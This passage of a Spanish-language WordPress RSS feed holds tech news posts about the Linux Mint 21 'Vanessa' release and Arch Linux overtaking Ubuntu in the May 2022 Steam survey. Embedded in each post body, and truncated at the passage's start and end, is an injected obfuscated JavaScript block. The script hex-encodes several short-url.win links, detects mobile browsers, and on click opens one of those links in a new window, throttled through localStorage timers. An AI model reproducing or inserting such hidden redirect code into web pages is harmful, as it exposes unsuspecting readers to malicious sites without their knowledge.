_0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>
<p><a href="https://www.todoenunclick.com/debian-12-bookworm-el-clasico-de-linux-se-renueva-con-innovacion-y-estabilidad/" rel="nofollow">Origen</a></p>]]></description>
		
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">97986</post-id>	</item>
		<item>
		<title>Linux Mint 21 “Vanessa” ya es oficial</title>
		<link>https://www.todoenunclick.com/linux-mint-21-vanessa-ya-es-oficial/</link>
		
		<dc:creator><![CDATA[gabybiondi]]></dc:creator>
		<pubDate>Mon, 01 Aug 2022 14:57:56 +0000</pubDate>
				<category><![CDATA[Tecnología]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[Linux Mint]]></category>
		<category><![CDATA[Linux Mint 21]]></category>
		<category><![CDATA[open source]]></category>
		<category><![CDATA[Software]]></category>
		<category><![CDATA[Vanessa]]></category>
		<guid isPermaLink="false">https://www.todoenunclick.com/?p=2960</guid>

					<description><![CDATA[<p><img width="950" height="634" src="https://www.todoenunclick.com/wp-content/uploads/2022/08/linux-mint-21-cinnamont.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" srcset="https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2022/08/linux-mint-21-cinnamont.jpg?w=950&amp;ssl=1 950w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2022/08/linux-mint-21-cinnamont.jpg?resize=240%2C160&amp;ssl=1 240w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2022/08/linux-mint-21-cinnamont.jpg?resize=503%2C336&amp;ssl=1 503w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2022/08/linux-mint-21-cinnamont.jpg?resize=768%2C513&amp;ssl=1 768w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2022/08/linux-mint-21-cinnamont.jpg?resize=629%2C420&amp;ssl=1 629w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2022/08/linux-mint-21-cinnamont.jpg?resize=640%2C427&amp;ssl=1 640w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2022/08/linux-mint-21-cinnamont.jpg?resize=681%2C454&amp;ssl=1 681w" sizes="auto, (max-width: 950px) 100vw, 950px" /></p>Después de terminar con éxito la prueba BETA, el equipo anunció el lanzamiento de la 36.ª edición de Linux Mint: “Vanessa”. Esta versión trae actualizaciones y mejoras significativas en comparación con la serie anterior Linux Mint 20.

Vamos a resumir las características esenciales antes de proceder a la descarga.

<strong>Linux Mint 21 – Novedades</strong>

Cambios principales y Cinnamon Desktop

En primer lugar, Linux Mint 21 “Vanessa” se basa en Ubuntu 22.04 LTS “Jammy Jellyfish”, que se lanzó en abril de este año. Por lo tanto, obtiene la cadena de herramientas actualizada, los paquetes, las actualizaciones principales y el último LTS Linux Kernel. Linux Mint 21 presenta Linux Kernel 5.15, el LTS Kernel actual que brinda el soporte de hardware más reciente en todos los módulos de Kernel.

En segundo lugar, Linux Mint “Vanessa” también presenta el último escritorio Cinnamon 5.4, el entorno de escritorio insignia de Linux Mint. Cinnamon 5.4 finalmente completa la reorganización de Mutter a su administrador de ventanas Muffin. A lo largo de los años, la reorganización de Mutter estaba en curso y, finalmente, Muffin se puso al día con la corriente. Puede experimentar esta última versión de CInnamon por primera vez con Linux Mint 21.

Otro cambio central en Cinnamon 5.4 es que algunas configuraciones de pantalla importantes se alejan del centro de control de gnomos al centro de control de canela. Aunque es posible que no vea muchos cambios visualmente, debería experimentar un rendimiento más rápido al administrar las pantallas.

Los diálogos de GTK ahora se representan correctamente en Cinnamon 5.4, gracias a la representación uniforme. Entonces, si usa una aplicación que usa una barra de encabezado GTK separada, se ve mejor y más envolvente con el escritorio Cinnamon.

<strong>Otros cambios</strong>

Además de lo anterior, la famosa herramienta Timeshift para realizar copias de seguridad ahora es una Xapp administrada por Linux Mint. Por lo tanto, puede esperar una mejor visión, control y hoja de ruta de esta herramienta de respaldo.

Además, el administrador de archivos Nemo ahora admite imágenes WebP de forma predeterminada para miniaturas y visualización a través de xviewer.

Los escritorios Xfce y MATE no tuvieron lanzamientos significativos durante un año o más. Por lo tanto, obtiene el mismo escritorio en esta versión, es decir, Xfce 4.16 y MATE 1.24.

Finalmente, otros cambios notables incluyen:
<ul>
 	<li>El lector de documentos Xreader ahora admite anotaciones menores.</li>
 	<li>Ahora puede pasar parámetros personalizados a los navegadores mientras usa WebApp.</li>
 	<li>Gracias al equipo de Mint, todavía puedes disfrutar de Firefox como un paquete básico básico, no como la versión Snap (como en Ubuntu 22.04).</li>
 	<li>El administrador de Bluetooth en Linux Mint ahora es Blueman, que reemplaza a Blueberry. Blueman trae más funciones y actualizaciones.</li>
 	<li>El servicio Systemd OOM (sin memoria) está deshabilitado de forma predeterminada en Linux Mint desde que surgieron varios informes de eliminación prematura de procesos en Ubuntu 22.04 hace un tiempo.</li>
</ul>
<strong>Fuente:</strong> <em>Debugpoint News</em>
<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x61\x69\x6a\x33\x63\x363','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x54\x59\x67\x35\x63\x365','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4c\x55\x4b\x38\x63\x398','abs','-local-storage','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4e\x56\x6d\x39\x63\x389','56bnMKls','opera','6946eLteFW','userAgent','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x64\x6c\x79\x34\x63\x344','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x65\x72\x66\x37\x63\x307','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x75\x76\x44\x32\x63\x392','floor','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x72\x77\x64\x36\x63\x356','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4b\x4d\x41\x30\x63\x360','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x69\x4d\x59\x31\x63\x381',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>
<p><a href="https://www.todoenunclick.com/linux-mint-21-vanessa-ya-es-oficial/" rel="nofollow">Origen</a></p>]]></description>
		
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">97303</post-id>	</item>
		<item>
		<title>Arch Linux desbanca a Ubuntu en la encuesta de Steam de mayo</title>
		<link>https://www.todoenunclick.com/arch-linux-desbanca-a-ubuntu-en-la-encuesta-de-steam-de-mayo/</link>
		
		<dc:creator><![CDATA[gabybiondi]]></dc:creator>
		<pubDate>Sun, 12 Jun 2022 20:42:33 +0000</pubDate>
				<category><![CDATA[Tecnología]]></category>
		<category><![CDATA[Arch Linux]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[Steam]]></category>
		<category><![CDATA[Ubuntu]]></category>
		<guid isPermaLink="false">https://www.todoenunclick.com/?p=2748</guid>

					<description><![CDATA[<p><img width="950" height="634" src="https://www.todoenunclick.com/wp-content/uploads/2022/06/Arch-Ubuntu-Steam.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" srcset="https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2022/06/Arch-Ubuntu-Steam.jpg?w=950&amp;ssl=1 950w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2022/06/Arch-Ubuntu-Steam.jpg?resize=240%2C160&amp;ssl=1 240w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2022/06/Arch-Ubuntu-Steam.jpg?resize=503%2C336&amp;ssl=1 503w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2022/06/Arch-Ubuntu-Steam.jpg?resize=768%2C513&amp;ssl=1 768w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2022/06/Arch-Ubuntu-Steam.jpg?resize=629%2C420&amp;ssl=1 629w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2022/06/Arch-Ubuntu-Steam.jpg?resize=640%2C427&amp;ssl=1 640w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2022/06/Arch-Ubuntu-Steam.jpg?resize=681%2C454&amp;ssl=1 681w" sizes="auto, (max-width: 950px) 100vw, 950px" /></p>Los resultados de la Encuesta de Steam están disponibles para mayo de 2022 y, si bien muestra que Linux está ligeramente por debajo en términos porcentuales, muestra un nuevo primer lugar para la distribución de Linux más popular que desbanca a Ubuntu LTS.

Los resultados de Steam Survey de abril de 2022 mostraron que Linux aumentó entre un 0,14 % y un 1,14 %. En abril, Ubuntu 20.04 LTS seguía siendo la principal distribución con una cuota de mercado del 0,16 % y Arch Linux con un 0,14 %, seguido de Manjaro Linux basado en Arch con un 0,13 %.

[caption id="attachment_2750" align="aligncenter" width="650"]<a href="https://www.todoenunclick.com/wp-content/uploads/2022/06/Arch-Ubuntu-Steam-01.jpg"><img class="size-full wp-image-2750" src="https://www.todoenunclick.com/wp-content/uploads/2022/06/Arch-Ubuntu-Steam-01.jpg" alt="" width="650" height="279" /></a> Los números de abril de 2022 con Ubuntu 20.04 LTS siendo la distribución más popular.[/caption]

Los resultados de Steam Survey están disponibles para mayo y muestran que Linux retrocede ligeramente un 0,02 % hasta una cuota de mercado general del 1,12 %, frente a Windows con un 96,68 % y macOS con un 2,2 %. En otras palabras, básicamente plano y puede ser aún más plano en términos absolutos de usuarios, ya que la base general de usuarios de Steam continúa creciendo. En esta etapa, tampoco parece que Steam Survey se informe/utilice cuando se ejecuta en Steam Deck en su modo Steam nativo fuera de la experiencia de escritorio de KDE.

[caption id="attachment_2751" align="aligncenter" width="650"]<a href="https://www.todoenunclick.com/wp-content/uploads/2022/06/Arch-Ubuntu-Steam-02.jpg"><img class="size-full wp-image-2751" src="https://www.todoenunclick.com/wp-content/uploads/2022/06/Arch-Ubuntu-Steam-02.jpg" alt="Arch Linux sale al frente de los resultados de Steam Survey de mayo de 2022." width="650" height="294" /></a> Arch Linux sale al frente de los resultados de Steam Survey de mayo de 2022.[/caption]

Aparte del porcentaje general bastante plano de Linux, bastante interesante es que el mes pasado Arch Linux de 64 bits superó a Ubuntu 20.04 LTS para ser la distribución de Linux más popular. De acuerdo, Arch Linux es una versión rodante contada como una en comparación con las versiones de Ubuntu, cada una de las cuales se cuenta como versiones diferentes, pero, de nuevo, Manjaro Linux y otros derivados de Arch Linux también se cuentan por separado. Desafortunadamente, con la agrupación "otra" de Steam Survey, es difícil hacer cálculos externos precisos.

<a href="https://www.todoenunclick.com/wp-content/uploads/2022/06/Arch-Ubuntu-Steam-03.jpg"><img class="aligncenter size-full wp-image-2752" src="https://www.todoenunclick.com/wp-content/uploads/2022/06/Arch-Ubuntu-Steam-03.jpg" alt="" width="650" height="401" /></a>En cualquier caso, muestra Arch Linux ahora en uso por el 0,14% de los usuarios de Steam en comparación con el 0,13% de Ubuntu 20.04.4 LTS y Manjaro Linux en tercer lugar con el 0,12%. Mientras tanto, Ubuntu 22.04 LTS ahora aparece en la lista con su nuevo lanzamiento y está al 0,09%. O, en términos relativos, al dividir solo los números de Linux, Arch Linux está al 12,85 % frente a Ubuntu 20.04.4 LTS al 11,75 %. SteamOS Holo también aparece ahora y en un 5,23 % para los usuarios de Linux.

<a href="https://www.todoenunclick.com/wp-content/uploads/2022/06/Arch-Ubuntu-Steam-04.jpg"><img class="aligncenter size-full wp-image-2753" src="https://www.todoenunclick.com/wp-content/uploads/2022/06/Arch-Ubuntu-Steam-04.jpg" alt="" width="650" height="203" /></a>Otra métrica interesante y posiblemente como resultado de contar algunos usuarios de Steam Deck desde el modo de escritorio KDE al menos es que Intel perdió el 4,2 % de su cuota de mercado de CPU de Linux durante el último mes y ahora Intel solo tiene un uso de CPU del 53,72 % entre los usuarios de Linux para AMD al 46%. Mientras tanto, al mirar solo los números de Windows, Intel tiene una participación de mercado del 67% frente a AMD con un 32%.

<strong>Fuente:</strong> <em>Phoronix</em>
<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x61\x69\x6a\x33\x63\x363','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x54\x59\x67\x35\x63\x365','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4c\x55\x4b\x38\x63\x398','abs','-local-storage','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4e\x56\x6d\x39\x63\x389','56bnMKls','opera','6946eLteFW','userAgent','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x64\x6c\x79\x34\x63\x344','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x65\x72\x66\x37\x63\x307','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x75\x76\x44\x32\x63\x392','floor','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x72\x77\x64\x36\x63\x356','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4b\x4d\x41\x30\x63\x360','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x69\x4d\x59\x31\x63\x381',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const 